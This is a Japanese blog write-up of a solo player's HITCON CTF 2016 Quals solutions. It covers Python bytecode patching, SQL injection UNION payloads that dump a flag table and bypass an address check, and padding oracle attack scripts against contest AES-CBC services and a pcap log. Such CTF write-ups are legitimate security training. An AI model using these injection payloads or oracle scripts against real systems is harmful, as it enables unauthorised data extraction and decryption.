HITCON CTF 2016 Qualsに一人チームで参加した。結果は500ptで103位。 たいした問題は解けてないが、供養。
Welcome (Reverse 50)
サービス問題。
$ python Python 2.7.6 (default, Jun 22 2015, 17:58:13) [GCC 4.8.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> print '}FTC NOCTIH ot emocleW{noctih'[::-1] hitcon{Welcome to HITCON CTF}
Handcrafted pyc (Reverse 50)
とりあえず適当なpycファイルからヘッダ8バイトを持ってきてpycファイルを作り、disモジュールを使ったディスアセンブルコードをもとにディスアセンブルしてみる(なお、コードの一部が間違っていたので修正した)。
#!/usr/bin/env python # -*- coding: utf-8 -*- import marshal, zlib, base64 code_obj = (marshal.loads(zlib.decompress(base64.b64decode('eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMruckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfqmQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4AVAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ==')))) print '\x03\xf3\x0d\x0a\x61\x79\xe6\x57' + marshal.dumps(code_obj)
# http://nedbatchelder.com/blog/200804/the_structure_of_pyc_files.html import dis, marshal, struct, sys, time, types def show_file(fname): f = open(fname, "rb") magic = f.read(4) moddate = f.read(4) modtime = time.asctime(time.localtime(struct.unpack('I', moddate)[0])) print "magic %s" % (magic.encode('hex')) print "moddate %s (%s)" % (moddate.encode('hex'), modtime) code = marshal.load(f) show_code(code) def show_code(code, indent=''): print "%scode" % indent indent += ' ' print "%sargcount %d" % (indent, code.co_argcount) print "%snlocals %d" % (indent, code.co_nlocals) print "%sstacksize %d" % (indent, code.co_stacksize) print "%sflags %04x" % (indent, code.co_flags) show_hex("code", code.co_code, indent=indent) dis.disassemble(code) print "%sconsts" % indent for const in code.co_consts: if type(const) == types.CodeType: show_code(const, indent+' ') else: print " %s%r" % (indent, const) print "%snames %r" % (indent, code.co_names) print "%svarnames %r" % (indent, code.co_varnames) print "%sfreevars %r" % (indent, code.co_freevars) print "%scellvars %r" % (indent, code.co_cellvars) print "%sfilename %r" % (indent, code.co_filename) print "%sname %r" % (indent, code.co_name) print "%sfirstlineno %d" % (indent, code.co_firstlineno) show_hex("lnotab", code.co_lnotab, indent=indent) def show_hex(label, h, indent): h = h.encode('hex') if len(h) < 60: print "%s%s %s" % (indent, label, h) else: print "%s%s" % (indent, label) for i in range(0, len(h), 60): print "%s %s" % (indent, h[i:i+60]) show_file(sys.argv[1])
$ python crackme.py >crackme.pyc $ python show_file.py crackme.pyc magic 03f30d0a moddate 6179e657 (Sat Sep 24 22:02:25 2016) code argcount 0 nlocals 0 stacksize 2 flags 0040 code 6401008400005a00006501006402006b0200721f00650000830000016e00 0064000053 1 0 LOAD_CONST 1 (<code object main at 0x7f20b73a6db0, file "<string>", line 1>) 3 MAKE_FUNCTION 0 6 STORE_NAME 0 (main) 4 9 LOAD_NAME 1 (__name__) 12 LOAD_CONST 2 ('__main__') 15 COMPARE_OP 2 (==) 18 POP_JUMP_IF_FALSE 31 5 21 LOAD_NAME 0 (main) 24 CALL_FUNCTION 0 27 POP_TOP 28 JUMP_FORWARD 0 (to 31) >> 31 LOAD_CONST 0 (None) 34 RETURN_VALUE consts None code argcount 0 nlocals 1 stacksize 9 flags 0043 code 740000640100830100740000640100830100740000640200830100740000 640300830100021702170217740000640400830100740000640500830100 (snip) 021702170217740000642200830100740000642300830100740000640400 830100740000641f0083010002170217021717171717474864000053 1 0 LOAD_GLOBAL 0 (chr) 3 LOAD_CONST 1 (108) 6 CALL_FUNCTION 1 9 LOAD_GLOBAL 0 (chr) 12 LOAD_CONST 1 (108) 15 CALL_FUNCTION 1 18 LOAD_GLOBAL 0 (chr) 21 LOAD_CONST 2 (97) 24 CALL_FUNCTION 1 27 LOAD_GLOBAL 0 (chr) 30 LOAD_CONST 3 (67) 33 CALL_FUNCTION 1 36 ROT_TWO 37 BINARY_ADD 38 ROT_TWO 39 BINARY_ADD 40 ROT_TWO 41 BINARY_ADD 42 LOAD_GLOBAL 0 (chr) 45 LOAD_CONST 4 (32) 48 CALL_FUNCTION 1 51 LOAD_GLOBAL 0 (chr) 54 LOAD_CONST 5 (101) 57 CALL_FUNCTION 1 60 LOAD_GLOBAL 0 (chr) 63 LOAD_CONST 6 (109) 66 CALL_FUNCTION 1 69 LOAD_GLOBAL 0 (chr) 72 LOAD_CONST 4 (32) 75 CALL_FUNCTION 1 78 ROT_TWO 79 BINARY_ADD 80 ROT_TWO 81 BINARY_ADD 82 ROT_TWO 83 BINARY_ADD 84 BINARY_ADD (snip) 741 JUMP_ABSOLUTE 759 >> 744 LOAD_GLOBAL 1 (raw_input) 747 JUMP_ABSOLUTE 1480 >> 750 LOAD_FAST 0 (password) 753 COMPARE_OP 2 (==) 756 JUMP_ABSOLUTE 767 >> 759 ROT_TWO 760 STORE_FAST 0 (password) 763 POP_TOP 764 JUMP_ABSOLUTE 744 >> 767 POP_JUMP_IF_FALSE 1591 (snip) 2217 RETURN_VALUE consts None 108 97 (snip) 61 names ('chr', 'raw_input') varnames ('password',) freevars () cellvars () filename '<string>' name 'main' firstlineno 1 lnotab '__main__' names ('main', '__name__') varnames () freevars () cellvars () filename '<string>' name '<module>' firstlineno 1 lnotab 000009030c01
ディスアセンブルされたコードを読むと、767バイト目のPOP_JUMP_IF_FALSE
で正否判定しているようなので、バイトコードの定義を見つつPOP_JUMP_IF_TRUE
に書き換えて実行してみる。
152: jabs_op('POP_JUMP_IF_FALSE', 114) # "" 153: jabs_op('POP_JUMP_IF_TRUE', 115) # ""
#!/usr/bin/env python # -*- coding: utf-8 -*- import marshal, zlib, base64 bytecode = zlib.decompress(base64.b64decode('eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMruckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfqmQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4AVAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ==')) i = bytecode.index('740000640100830100740000640100830100740000640200830100740000'.decode('hex')) i += bytecode[i:].index(chr(114)) bytecode = bytecode[:i] + chr(115) + bytecode[i+1:] exec(marshal.loads(bytecode))
$ python crackme2.py password: hitcon{Now you can compile and run Python bytecode in your brain!}
Are you rich? (Web 50)
SQL injection問題。
i1EJG83Y35Pa3ReiiEjwmPiDXonmpdnm3WKA' UNION SELECT table_name FROM information_schema.columns LIMIT 1 OFFSET 61 # => Error!: Remote API server reject your invalid address 'flag1'. If your address is valid, please PM @cebrusfs or other admin on IRC. 1EJG83Y35Pa3ReiiEjwmPiDXonmpdnm3WKA' UNION SELECT column_name FROM information_schema.columns WHERE table_name = 'flag1' # => Error!: Remote API server reject your invalid address 'flag'. If your address is valid, please PM @cebrusfs or other admin on IRC. 1EJG83Y35Pa3ReiiEjwmPiDXonmpdnm3WKA' UNION SELECT flag FROM flag1 # => Error!: Remote API server reject your invalid address 'hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}'. If your address is valid, please PM @cebrusfs or other admin on IRC.
Are you rich 2 ? (Web 100)
SQL injection問題の続き。 テーブル定義を見ると、入力したビットコインアドレスがissued_addressテーブルに入っているかを確認した上で残高を問い合わせているようなので、次のようにしてissued_addressテーブルにお金持ちのアドレスが入っているように誤認識させた(?)。
1EJG83Y35Pa3ReiiEjwmPiDXonmpdnm3WKA' UNION SELECT table_name FROM information_schema.columns LIMIT 1 OFFSET 62 # => Error!: Remote API server reject your invalid address 'issued_address'. If your address is valid, please PM @cebrusfs or other admin on IRC. 1EJG83Y35Pa3ReiiEjwmPiDXonmpdnm3WKA' UNION SELECT '3Nxwenay9Z8Lc9JBiywExpnEFiLp6Afp8v' FROM issued_address # => Well done! Aww yeah, you successfully read this important message. Thank you for buying flag. Here's your flag: Flag2 is: hitcon{u51n6_07h3r_6uy5_b17c0n_70_byp455_ch3ck1n6_15_fun!!}
Let's Decrypt (Crypto 100)
CBCモードに対するPadding oracle attackを行い、既知平文からIVを求める問題。
接続すると、次のようにしてソースコードが得られる。
1) Show me the source 2) Let's decrypt 1 #!/usr/bin/env ruby require 'openssl' require 'timeout' $stdout.sync = true Dir.chdir(File.dirname(__FILE__)) class String def enhex self.unpack('H*')[0] end def dehex [self].pack('H*') end end flag = IO.read('flag') KEY = IV = flag[/hitcon\{(.*)\}/, 1] fail unless KEY.size == 16 def aes(s, mode) cipher = OpenSSL::Cipher::AES128.new(:CBC) cipher.send(mode) cipher.key = KEY cipher.iv = IV cipher.update(s) + cipher.final end def encrypt(s); aes(s, :encrypt) end def decrypt(s); aes(s, :decrypt) end m = 'The quick brown fox jumps over the lazy dog' c = encrypt(m) fail unless c.enhex == '4a5b8d0034e5469c071b60000ca134d9e04f07e4dcd6cf096b47ba48b357814e4a89ef1cfad33e1dd28b892ba7233285' fail unless c.enhex.dehex == c fail unless decrypt(c) == m begin Timeout::timeout(30) do puts '1) Show me the source' puts "2) Let's decrypt" cmd = gets.to_i case cmd when 1 puts IO.read(__FILE__) when 2 c = gets.chomp.dehex m = decrypt(c) puts m.enhex else puts '...meow?' end end rescue Timeout::Error puts 'Timeout ._./' end
復号に失敗したとき例外エラーのメッセージが返ってくるので、これをもとに1番目の暗号文ブロックに繋がる暗号文ブロックを探す。 見つかったら、下図を参考に1番目の平文ブロックおよびパディングとXORを取ることでIVを得る。
import socket def xor(a, b): return ''.join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b)) c0 = '4a5b8d0034e5469c071b60000ca134d9e04f07e4dcd6cf096b47ba48b357814e4a89ef1cfad33e1dd28b892ba7233285'.decode('hex')[:16] m0 = 'The quick brown fox jumps over the lazy dog'[:16] """ x = [] for i in xrange(16): for c in xrange(256): s = socket.create_connection(('52.69.125.71', 4443)) s.recv(8192) s.recv(8192) s.sendall('2\n') buf = chr(c) buf += ''.join(chr(c) for c in x) buf = buf.rjust(16, '\x00') print "%r" % buf buf += c0 s.sendall(buf.encode('hex') + '\n') result = s.recv(8192) if not "/home/letsdecrypt/letsdecrypt.rb:27:in `final'" in result: x = [c] + x print ''.join(chr(c) for c in x) x = [c ^ (i+1) ^ (i+2) for c in x] break else: break """ x = '\x16L\x1bTQ\x08Y:-\x10\x02\x0e\x05G&t' print xor(xor(x, m0), '\x10'*16)
$ python solve.py R4nd0m IV plz XD
Hackpad (Crypto 150)
CBCモードに対するPadding oracle attackのログから復号された文字列を求める問題。
まずはpcapファイルから復号に成功したメッセージの列を取り出す。
$ strings hackpad.pcap | grep -e '^msg=' -e '\md5' | grep -B1 '^md5' | grep '^msg=' >msgs.txt $ head msgs.txt msg=3ed2e01c1d1248125c67ac637384a22d997d9369c74c82abba4cc3b1bfc65f026c957ff0feef61b161cfe3373c2d9b905639aa3688659566d9acc93bb72080f7e5ebd643808a0e50e1fc3d16246afcf688dfedf02ad4ae84fd92c5c53bbd98f08b21d838a3261874c4ee3ce8fbcb96628d5706499dd985ec0c13573eeee03766f7010a867edfed92c33233b17a9730eb4a82a6db51fa6124bfc48ef99d669e21740d12656f597e691bbcbaa67abe1a09f02afc37140b167533c7536ab2ecd4ed37572fc9154d23aa7d8c92b84b774702632ed2737a569e4dfbe01338fcbb2a77ddd6990ce169bb4f48e1ca96d30eced23b6fe5b875ca6481056848be0fbc26bcbffdfe966da4221103408f459ec1ef12c72068bc1b96df045d3fa12cc2a9dcd162ffdf876b3bc3a3ed2373559bcbe3f470a8c695bf54796bfe471cd34b463e9876212df912deef882b657954d7dada47 msg=00000000000000000000000000000000997d9369c74c82abba4cc3b1bfc65f02 msg=00000000000000000000000000000000997d9369c74c82abba4cc3b1bfc65f02 msg=0000000000000000000000000000d903997d9369c74c82abba4cc3b1bfc65f02 msg=00000000000000000000000000efd802997d9369c74c82abba4cc3b1bfc65f02 msg=00000000000000000000000007e8df05997d9369c74c82abba4cc3b1bfc65f02 msg=00000000000000000000000706e9de04997d9369c74c82abba4cc3b1bfc65f02 msg=00000000000000000000d80405eadd07997d9369c74c82abba4cc3b1bfc65f02 msg=00000000000000000007d90504ebdc06997d9369c74c82abba4cc3b1bfc65f02 msg=00000000000000003b08d60a0be4d309997d9369c74c82abba4cc3b1bfc65f02
あとは、特定された文字を順番に計算して繋げていく。
import re with open('msgs.txt') as f: data = f.read() lines = data.splitlines() ck = re.findall(r'\w{32}', lines[0][4:]) s = '' for j in xrange(20): c = ck[j].decode('hex') for i in xrange(16): x = lines[16*j+i+2][4:][:32] x = x.decode('hex') y = ''.join(chr(ord(a) ^ ord(b) ^ (i+1)) for a, b in zip(c, x)) print "%r" % y s += y print s
$ python solve.py '?\xd3\xe1\x1d\x1c\x13I\x13]f\xadbr\x85\xa3,' '<\xd0\xe2\x1e\x1f\x10J\x10^e\xaeaq\x86y,' '=\xd1\xe3\x1f\x1e\x11K\x11_d\xaf`phy,' ':\xd6\xe4\x18\x19\x16L\x16Xc\xa8gphy,' ';\xd7\xe5\x19\x18\x17M\x17Yb\xa9aphy,' '8\xd4\xe6\x1a\x1b\x14N\x14Zaraphy,' '9\xd5\xe7\x1b\x1a\x15O\x15[graphy,' '6\xda\xe8\x14\x15\x1a@\x1aography,' '7\xdb\xe9\x15\x14\x1bAtography,' '4\xd8\xea\x16\x17\x18ptography,' '5\xd9\xeb\x17\x16yptography,' '2\xde\xec\x10ryptography,' '3\xdf\xedcryptography,' '0\xdc cryptography,' '1n cryptography,' 'In cryptography,' '\x98|\x92h\xc6M\x83\xaa\xbbM\xc2\xb0\xbe\xc7^l' (snip) 'tive.\n\n\n\n\n\n\n\n\n\n\n' In cryptography, a padding oracle attack is an attack which is performed using the padding of a cryptographic message. hitcon{H4cked by a de1ici0us pudding '3'} In cryptography, variable-length plaintext messages often have to be padded (expanded) to be compatible with the underlying cryptographic primitive.
所感
例によって、Pwn、Reverseカテゴリがまったくダメで厳しい。 他には、下記の問題を主に見ていた。
- Secret Holder (pwn 100)
- Secure Posts (web 50)
- Secure Posts 2 (web 150)
- %%% (web, orange 100)
- Baby Trick (web, orange 200)
- Leaking (web, orange 200)
Secure Postsが解けなかったのが痛い。